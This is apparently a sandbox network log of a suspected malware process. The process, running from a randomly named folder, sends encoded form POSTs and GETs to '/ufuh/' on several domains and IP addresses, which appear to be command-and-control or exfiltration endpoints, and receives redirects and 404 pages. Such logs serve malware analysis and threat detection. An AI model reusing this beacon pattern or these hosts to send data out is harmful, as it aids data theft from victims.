Jun 3, 2024 08:54:07.614444017 CEST	737	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.ibistradingco.com Origin: http://www.ibistradingco.com Referer: http://www.ibistradingco.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4d 68 4d 73 53 6b 6a 58 4a 6b 50 45 36 37 56 75 2f 48 7a 30 4e 56 7a 38 6f 31 68 52 58 58 71 6e 50 7a 6b 6f 59 67 50 7a 7a 6d 48 71 36 70 43 6d 64 6e 64 75 2b 4d 33 69 56 39 43 4a 78 73 2f 53 70 50 38 49 54 36 56 41 49 62 59 7a 73 69 38 67 72 70 78 36 71 4d 47 66 6b 59 76 49 4f 49 6c 48 33 41 6c 4d 66 65 35 66 65 66 4a 4b 47 68 50 39 51 35 63 63 78 62 74 74 2b 2f 44 57 4e 4e 43 4d 56 59 43 69 49 53 71 7a 46 48 70 6c 6b 4b 74 62 72 74 71 78 77 57 58 48 57 31 54 32 65 7a 70 73 55 31 4e 62 4f 74 61 52 38 65 45 61 2b 4c 62 68 69 37 4a 2f 6d 51 3d 3d Data Ascii: ZXdp=sex33F1+yMJgMhMsSkjXJkPE67Vu/Hz0NVz8o1hRXXqnPzkoYgPzzmHq6pCmdndu+M3iV9CJxs/SpP8IT6VAIbYzsi8grpx6qMGfkYvIOIlH3AlMfe5fefJKGhP9Q5ccxbtt+/DWNNCMVYCiISqzFHplkKtbrtqxwWXHW1T2ezpsU1NbOtaR8eEa+Lbhi7J/mQ==
Jun 3, 2024 08:54:08.706489086 CEST	1216	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Mon, 03 Jun 2024 06:54:08 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.ibistradingco.com/ufuh/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: f982b021f196cd30fbf6fca46f95b329-fast-edge1 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.273 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49190	89.116.109.159	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:10.142946005 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.ibistradingco.com Origin: http://www.ibistradingco.com Referer: http://www.ibistradingco.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4e 46 77 73 56 44 58 58 63 30 50 48 77 62 56 75 32 6e 7a 4b 4e 56 33 38 6f 78 52 37 58 69 36 6e 50 69 30 6f 59 47 62 7a 31 6d 48 71 75 5a 43 59 54 48 63 33 2b 4d 6a 45 56 38 79 33 78 76 54 53 6f 73 6f 49 44 50 4a 50 52 37 59 31 6f 69 38 68 72 70 77 75 71 4e 71 62 6b 59 69 6c 4f 49 74 48 33 79 64 4d 58 4f 35 63 64 66 4a 4b 47 68 50 35 51 35 64 50 78 62 56 31 2b 2b 4b 4f 4e 37 6d 4d 51 4d 57 69 4b 7a 71 77 48 48 70 68 6f 71 73 77 67 59 44 6d 31 6c 2f 74 49 46 66 31 52 7a 68 2f 59 69 70 64 45 63 69 6b 30 75 74 30 78 37 79 68 68 6f 67 44 77 67 72 61 52 42 67 6b 4a 42 30 54 75 7a 48 69 62 36 52 6f 52 67 4b 56 78 35 2f 57 72 59 6b 70 47 66 43 63 4a 44 48 32 75 35 72 46 64 52 36 56 4a 6a 33 37 45 68 52 63 6a 6a 64 37 74 5a 36 4a 45 33 39 4c 6e 38 47 73 38 69 33 48 34 4b 77 75 50 49 56 46 62 56 78 50 63 43 51 2b 35 58 45 2b 58 35 69 42 43 75 62 41 4b 51 70 74 77 6a 38 73 65 49 45 4b 50 4b 71 76 64 31 51 4e 39 35 79 6c 43 33 79 78 38 6e 32 2f 76 6c 4d 35 50 [TRUNCATED] Data Ascii: ZXdp=sex33F1+yMJgNFwsVDXXc0PHwbVu2nzKNV38oxR7Xi6nPi0oYGbz1mHquZCYTHc3+MjEV8y3xvTSosoIDPJPR7Y1oi8hrpwuqNqbkYilOItH3ydMXO5cdfJKGhP5Q5dPxbV1++KON7mMQMWiKzqwHHphoqswgYDm1l/tIFf1Rzh/YipdEcik0ut0x7yhhogDwgraRBgkJB0TuzHib6RoRgKVx5/WrYkpGfCcJDH2u5rFdR6VJj37EhRcjjd7tZ6JE39Ln8Gs8i3H4KwuPIVFbVxPcCQ+5XE+X5iBCubAKQptwj8seIEKPKqvd1QN95ylC3yx8n2/vlM5PV3Fsggs6Rm3z+SWfACIMISKevImb2gLeqcv3BLQF4yjzoSWQ+i1fdkeHnaqIOf6OBpoOHEulRWtztGqwQYUuJLv+UNa1k3eiB4SpPrtLIka6hBH6vUuCd8Xm9EogGCKWAFofDoUiEeSxPZTxMUj22UcDi92uO8dN8vl3NVxNOebOSiLsOkO7ZYtoW7lHs38FAzivXzd/ut8sVv/fsUVAn8f3nL6QfIMcjVM9PObn5lsqS07zh6k3YiZpRm6B9Gy/MoRXmPtV3XtyFaWftMbT8cQBQr5eAUwLabfo/TZtaZgAgoMEZmxqylsJ0QjZO58G9sslsHzFga/og4vzV08X+cwHxDzNKDVEkV/Gg00up3Q0FMxAp6CmmTsmiAuMvtvOlx3mBDWySDfZvlrmZTX4oKxG0yPw/DXgK62wz/q0PQDfrZryOdgPIZ2oHZ5n+2wNOmQPYQtzmvjybK7KouJrOzRQwEOCKnarOc6JA04NkQNRyUEHStBfJDSQNL93IEZTsexXyMvW2C/Dcd9ds3XX3Kac8sPqkz/43xjmIa69pQbf2MEJ7oVWPJiQJ62rz/GP5jCXmSh1HS7TwjdvUvYRZzEKht1rUNupi5bARSnuQqjWrBfVX3qKMcXxpfqPI08vD/HMjchkHBYw0ay9pWHV2sfO8s5L9hlZ2L [TRUNCATED]
Jun 3, 2024 08:54:10.147959948 CEST	1690	OUT	Data Raw: 62 37 43 73 59 45 62 4c 34 49 6f 65 74 4e 58 78 66 43 53 5a 30 70 46 79 46 51 4e 68 77 71 39 36 74 37 48 39 79 38 6b 72 67 51 56 48 70 56 76 7a 4c 44 32 6a 4f 59 44 45 39 58 6a 6b 54 43 7a 36 64 43 50 36 4d 71 4c 6b 71 36 32 36 6b 7a 67 30 73 57 Data Ascii: b7CsYEbL4IoetNXxfCSZ0pFyFQNhwq96t7H9y8krgQVHpVvzLD2jOYDE9XjkTCz6dCP6MqLkq626kzg0sW04V1BXQKDRepQ6uj0vwKO+5ioNfp6UM7fQ137Z+YyeFdbYFbLi0WTOMw+tWB6NnpN9WmpQnDaT0N8cpsapPl6j0HyCtzGTyHOWzZzoPXufoJsG2tFciRmLvyhflpYnZ4YowM3Kx0CIDvx4tiKI29DSRCrhPnADOaC
Jun 3, 2024 08:54:11.229222059 CEST	1216	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Mon, 03 Jun 2024 06:54:11 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.ibistradingco.com/ufuh/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 64ccb9a2e9597685821e505daa8c99c8-fast-edge3 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.274 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49191	89.116.109.159	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:12.669840097 CEST	466	OUT	GET /ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ibistradingco.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:54:13.779272079 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Mon, 03 Jun 2024 06:54:13 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.ibistradingco.com/ufuh/?ZXdp=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&7jsp7=zz9xHbtX platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 53454825ecab98a0ab901c17779226a7-fast-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.273 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:2
Jun 3, 2024 08:54:13.779290915 CEST	122	IN	Data Raw: 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c Data Ascii: 0px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49192	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:19.349253893 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.jnkinteractive.co.kr Origin: http://www.jnkinteractive.co.kr Referer: http://www.jnkinteractive.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 42 57 2f 7a 41 62 47 61 36 37 6c 77 72 61 71 50 56 35 59 44 6f 59 6b 47 47 34 6b 57 6d 76 4c 42 4e 64 73 65 43 4c 49 4f 4f 41 4d 36 73 4f 4d 61 46 79 67 6a 48 62 4d 30 48 4b 6f 61 68 6f 4b 77 79 51 32 54 51 5a 47 74 74 51 43 53 4c 73 6c 4e 75 67 63 63 32 4f 44 4c 71 2b 61 6c 39 70 2f 4d 74 2b 65 33 4d 75 45 33 2f 36 5a 47 75 2b 52 4b 33 77 4e 78 47 50 2b 6e 38 4d 77 42 42 56 75 30 7a 57 2f 55 35 55 38 64 53 69 53 53 45 69 44 37 39 47 41 4b 44 4a 6e 65 53 2f 31 54 30 67 76 6d 32 56 72 70 34 72 6e 30 67 79 62 69 65 76 79 53 77 4d 44 4b 64 39 58 77 79 4d 51 64 45 44 73 51 42 54 32 79 4a 66 33 38 61 4e 31 4f 34 43 48 31 6b 54 36 59 63 42 53 44 62 43 77 43 36 73 41 73 4d 70 33 46 76 62 65 65 5a 5a 6d 52 58 6f 62 74 66 63 58 4d 4f 6f 57 58 54 69 57 52 68 44 4e 55 59 51 49 32 47 2f 6e 4d 6f 61 59 36 49 2b 43 58 57 52 51 73 32 6e 65 54 44 55 42 57 74 49 4b 62 67 6a 70 77 51 46 55 6f 6e 38 58 64 47 49 62 48 59 55 6a 4f 77 6c 36 61 55 72 4f 63 42 71 65 4e 37 [TRUNCATED] Data Ascii: ZXdp=JZKxbQTXVGqeBW/zAbGa67lwraqPV5YDoYkGG4kWmvLBNdseCLIOOAM6sOMaFygjHbM0HKoahoKwyQ2TQZGttQCSLslNugcc2ODLq+al9p/Mt+e3MuE3/6ZGu+RK3wNxGP+n8MwBBVu0zW/U5U8dSiSSEiD79GAKDJneS/1T0gvm2Vrp4rn0gybievySwMDKd9XwyMQdEDsQBT2yJf38aN1O4CH1kT6YcBSDbCwC6sAsMp3FvbeeZZmRXobtfcXMOoWXTiWRhDNUYQI2G/nMoaY6I+CXWRQs2neTDUBWtIKbgjpwQFUon8XdGIbHYUjOwl6aUrOcBqeN7Uip7kUz0bOLvO00n115+7cE3KfRCiUSOX64AxT+d/gzbWDyVSokiva2yv8go1dVRTInP4Q/OnbX3y/QZbnF9RkKElXak/nv1tW16TWmSS5ctUP25Lu3IpQl9UHJwxlMdGcDKlU4cKMfq2M7YANJlglH+T9BFQFZ59MwUskpZbzN7/Ti5EQURAvZjq4qzq925ArnnYQ+QZBhweKtoKoXrp40ym3DBz6deP63HkF5Rj9BHX9mLHHNpFK0z7s4mK+F8j3bsLfYgXxKhXoYFZWZVjGb0SpFhxwRYC8egdk6OhBU8KNs0J8Tj3tKjBbKnqsiwlu+uRMShXpKAJ1OR+KhGcWC2UQ8/axU2aH6v393twBZ5zljvGvBwDcdA9tcgRYIxBgEe0MyHCh6WWROtC3zrASwOX/XsSuLS2bMYt/AT6xP+hR7DZjtag4oCdHjdxLs2wzmkclJ3Oo0ZgygLT9Px7192NPP97eUD+ynkvy8vu39zSmzlDEgy+uub5vlD2MxODNxkwFK3Tp3yqJRY0YtC9/Iz3LHNy6YTrZoEYtOu+oULaJxpxKZ5FqBLcYYW7GOzvg9dQpAi77qmb4+5MMyIzGBLKWQLTB5Dzj1biOLjLSculbV+aVR3L7t6y7BUb+qCXXsE5tEScPTBh2FudIQVN1BOP7MpINAY/k [TRUNCATED]
Jun 3, 2024 08:54:19.354192972 CEST	235	OUT	Data Raw: 61 2b 6d 62 73 43 65 30 56 59 51 62 50 50 51 66 68 56 62 31 2b 46 66 6c 77 47 71 45 6b 52 48 64 6e 73 30 6e 59 34 58 65 49 77 56 46 30 50 65 6b 58 50 4b 37 31 67 58 43 35 43 4f 78 53 65 62 49 41 31 56 4c 6e 79 6b 38 45 57 34 70 79 2b 6c 6b 76 71 Data Ascii: a+mbsCe0VYQbPPQfhVb1+FflwGqEkRHdns0nY4XeIwVF0PekXPK71gXC5COxSebIA1VLnyk8EW4py+lkvqEPDty6g1fFxbIlci4zmeJkN+h68sYcHw8FcOdxf1u0ecq/Cd6N38M1EgmMlEsX9EB3E2sG04DqdHg26XGmL21Pi/A/XiZFjWFeaqgk6SZ5q+XwoNWM77KFlSCj9z6A1a4MqpterbYxlNdv+v7nRLKBrIN
Jun 3, 2024 08:54:20.729526997 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:54:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 64 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 5a 6f 6f db c6 19 7f 3d 7f 0a 8a c5 6c b2 21 29 4a 76 1c 8f 32 93 b6 ae 3b 74 4b 97 22 4e 50 14 b1 11 9c c8 93 74 36 c5 63 ef 8e 96 55 45 40 87 0d c3 d0 6e 7d d3 0d 2b 86 0e d8 80 02 1b f6 aa d8 1f 34 2f f6 89 12 e7 3b ec b9 3b 4a a2 24 aa 8e 1d 77 43 02 8a bc 7b ee 79 9e fb 3d 7f 8f f4 6e ed ed 7b 7b 0f 3e 7c 7f df e8 89 7e 72 7b 6d 57 fe 18 09 4a bb a1 79 42 dd 9f de 37 e5 18 46 f1 ed b5 1f ec f6 b1 40 46 d4 43 8c 63 11 9a 0f 1f bc e3 ee 98 46 7d 3a 93 a2 3e 0e cd 53 82 07 19 65 c2 34 22 9a 0a 9c 02 e5 80 c4 a2 17 c6 f8 94 44 d8 55 0f 8e 41 52 22 08 4a 5c 1e a1 04 87 0d c5 a7 c4 66 83 d1 36 15 7c 63 ca 64 23 a5 24 8d f1 99 63 74 68 92 d0 c1 86 5c 00 92 6b ae 6b 3c e8 11 6e 70 22 b0 01 bf 34 13 a4 4f 3e c6 b1 31 20 a2 67 88 1e 36 3e a4 88 0b e3 60 ff 9e 91 25 79 97 a4 c6 69 b3 e9 ed 18 2e ec 59 64 3c a8 d7 87 92 c0 8b 68 bf 3e a0 2c ce 18 e6 bc ae 49 79 9d 63 5a 37 5c 77 ba cb 8c d1 0c 33 31 0c 4d da 0d 12 2a d5 2f 6d f5 84 3e 06 cc 4a a0 cc 91 0b 22 [TRUNCATED] Data Ascii: d43Zoo=l!)Jv2;tK"NPt6cUE@n}+4/;;J$wC{y=n{{>\|~r{mWJyB7F@FCcF}:>Se4"DUAR"J\f6\|cd#$cth\kk<np"4O>1 g6>`%yi.Yd<h>,IycZ7\w31M/m>J"_\|uO}q_g_{uq/o?\|7o?~s+eK\|KlK_I!XeYB"$MI\|$T{.CY=2PZ30'f$e]1# 2>]I'x1r6ms\DT8f5"J`i+WL8@~}y7\|Fp0#iwlK,3QN%1IzRARn]vT*=n]^MHzb0q]Qo]Q2V(4HE0o:^5u>ix<+S`\FeqOk919Bkr#4Ffq:XK:C`a]->7<
Jun 3, 2024 08:54:20.729557991 CEST	1236	IN	Data Raw: 0f eb b7 9a 67 b7 9a 87 32 e6 75 fe f1 b2 54 66 1c 7e da bd 1a 3f 58 a8 b8 c1 ef be 66 08 77 f2 99 e6 2c c2 32 aa 21 d7 01 dc 6a 59 c1 5f b1 af c2 e3 b0 3e c8 20 48 a3 24 8f a5 c0 63 ae 06 d4 52 17 ac 89 61 d7 5e 1f 22 ec 98 df 39 c5 2c dc f6 b6 Data Ascii: g2uTf~?Xfw,2!jY_> H$cRa^"9,-s<n_J!(kNc'GnM2JL`J+~X)oc;EIu,{P9OxvmQ'~B:CKzRx<Y C`V}w\|Qz}>0
Jun 3, 2024 08:54:20.729568958 CEST	1236	IN	Data Raw: bb 5c 0c 65 c3 1e 87 1b d0 e8 b7 13 1a 9d b8 f2 c5 85 ab 0e 64 70 14 90 85 cb 8d 38 df b8 bd e6 55 50 18 68 14 d1 84 b2 80 a4 3d cc 88 18 57 52 8d 64 c5 83 e7 8f 71 60 00 78 96 eb 02 91 3c f3 42 8f ee ba d3 49 d7 ed e3 98 e4 7d bb a5 86 06 aa eb Data Ascii: \edp8UPh=WRdq`x<BI}>JZJ^1Z@l)\!qJB_]`e219w;81=_]>&0p]!4+TQ@7RtJ-tS6VrMU4Nfn2Ps
Jun 3, 2024 08:54:20.729640961 CEST	76	IN	Data Raw: 97 3e 0b 3a 95 84 2a 0c 3a 09 43 99 41 2b a6 4b 46 f1 4b 79 78 92 da e6 72 6e 79 5d e1 e1 45 ea ab 98 28 52 76 69 66 89 c9 0c 9e 47 f2 03 85 ae 9b a1 5a 78 b4 32 03 bf 94 bb cd 19 45 37 6d 8a 6d a9 1f f9 2f 00 00 00 ff ff 0d 0a Data Ascii: >:*:CA+KFKyxrny]E(RvifGZx2E7mm/
Jun 3, 2024 08:54:20.729650974 CEST	1236	IN	Data Raw: 65 34 61 0d 0a bc 5c 6d 6f e3 36 12 fe dc fe 0a 21 c1 a1 d1 1e 6d 48 94 2c cb 0e ee 70 68 8b c5 f5 c3 de 1d 6e d1 4f 87 c5 42 b6 e4 d8 a8 13 1b 7e d9 24 35 f2 df 6f 66 48 4a 14 45 bd 58 4a bb bb d9 d8 d4 cc 33 43 6a 34 33 1c 92 2a e7 23 62 d3 09 Data Ascii: e4a\mo6!mH,phnOB~$5ofHJEXJ3Cj43#b5mPq^_\|w:W?D$]Ka\w37\6gEBjJ5Qm7CBv;HjhduEro<s<d~Q\|EQ
Jun 3, 2024 08:54:20.729720116 CEST	1236	IN	Data Raw: 61 50 f2 39 07 10 c7 59 ea af 96 4d d8 3a b5 98 64 34 51 8b 39 07 90 ce 16 13 3f ab e9 23 9e 76 6a b9 7b 98 46 1c 92 e3 a9 c5 6e f6 07 78 ec 0f 68 2e b3 9f 3f 7e e4 35 54 f9 7e 33 a0 0b c2 c9 4f 75 68 27 2c a0 08 b2 8f 11 fe 35 c8 f2 24 bb 32 79 Data Ascii: aP9YM:d4Q9?#vj{Fnxh.?~5T~3Ouh',5$2ys57&SLL$.'@R'4Bnv{{1UQi{*Ub4n)#&k<)l M/w-\|N_D!
Jun 3, 2024 08:54:20.729732037 CEST	424	IN	Data Raw: 9b 0e f4 cf 35 62 5a c0 b6 49 8e 55 7c 34 a1 72 ad 64 04 2b 99 b4 20 79 48 f6 45 97 94 40 22 2f 3d cc bb 67 d7 69 e8 c3 c5 de 83 76 3c 6b 37 2e b6 4e b4 62 7d b0 2a 21 bb 76 0d 22 d8 d2 f1 74 48 30 f1 78 cf 4e 57 60 87 f7 dd 84 7c b7 21 20 ef ed Data Ascii: 5bZIU\|4rd+ yHE@"/=giv<k7.Nb}*!v"tH0xNW`\|! \t#%nQy\t!+8Ia.K~x-r\oU7_k")?\|Ja4<W."/qAOU-w^pbI\|5{78tNSqXUrjjS{Wf
